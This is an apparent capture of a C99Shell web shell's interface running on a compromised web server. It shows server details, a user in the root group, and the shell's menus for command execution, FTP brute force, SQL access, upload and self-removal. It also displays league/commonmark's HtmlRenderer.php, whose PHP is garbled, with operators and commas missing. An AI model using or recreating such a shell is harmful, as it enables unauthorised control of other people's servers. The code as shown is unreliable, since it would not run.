!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/qr.picotech.app/public_html_v3_3/backup/vendor/league/commonmark/src/   drwxr-xr-x
Free 25.72 GB of 117.98 GB (21.8%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     HtmlRenderer.php (3.32 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the league/commonmark package.
 *
 * (c) Colin O'Dell <colinodell@gmail.com>
 *
 * Original code based on the CommonMark JS reference parser (https://bitly.com/commonmark-js)
 *  - (c) John MacFarlane
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace League\CommonMark;

use 
League\CommonMark\Block\Element\AbstractBlock;
use 
League\CommonMark\Block\Renderer\BlockRendererInterface;
use 
League\CommonMark\Inline\Element\AbstractInline;
use 
League\CommonMark\Inline\Renderer\InlineRendererInterface;

/**
 * Renders a parsed AST to HTML
 */
final class HtmlRenderer implements ElementRendererInterface
{
    
/**
     * @var EnvironmentInterface
     */
    
protected $environment;

    
/**
     * @param EnvironmentInterface $environment
     */
    
public function __construct(EnvironmentInterface $environment)
    {
        
$this->environment $environment;
    }

    
/**
     * @param string $option
     * @param mixed  $default
     *
     * @return mixed|null
     */
    
public function getOption(string $option$default null)
    {
        return 
$this->environment->getConfig('renderer/' $option$default);
    }

    
/**
     * @param AbstractInline $inline
     *
     * @throws \RuntimeException
     *
     * @return string
     */
    
public function renderInline(AbstractInline $inline): string
    
{
        
$renderers $this->environment->getInlineRenderersForClass(\get_class($inline));

        
/** @var InlineRendererInterface $renderer */
        
foreach ($renderers as $renderer) {
            if ((
$result $renderer->render($inline$this)) !== null) {
                return 
$result;
            }
        }

        throw new 
\RuntimeException('Unable to find corresponding renderer for inline type ' \get_class($inline));
    }

    
/**
     * @param AbstractInline[] $inlines
     *
     * @return string
     */
    
public function renderInlines(iterable $inlines): string
    
{
        
$result = [];
        foreach (
$inlines as $inline) {
            
$result[] = $this->renderInline($inline);
        }

        return 
\implode(''$result);
    }

    
/**
     * @param AbstractBlock $block
     * @param bool          $inTightList
     *
     * @throws \RuntimeException
     *
     * @return string
     */
    
public function renderBlock(AbstractBlock $blockbool $inTightList false): string
    
{
        
$renderers $this->environment->getBlockRenderersForClass(\get_class($block));

        
/** @var BlockRendererInterface $renderer */
        
foreach ($renderers as $renderer) {
            if ((
$result $renderer->render($block$this$inTightList)) !== null) {
                return 
$result;
            }
        }

        throw new 
\RuntimeException('Unable to find corresponding renderer for block type ' \get_class($block));
    }

    
/**
     * @param AbstractBlock[] $blocks
     * @param bool            $inTightList
     *
     * @return string
     */
    
public function renderBlocks(iterable $blocksbool $inTightList false): string
    
{
        
$result = [];
        foreach (
$blocks as $block) {
            
$result[] = $this->renderBlock($block$inTightList);
        }

        
$separator $this->getOption('block_separator'"\n");

        return 
\implode($separator$result);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--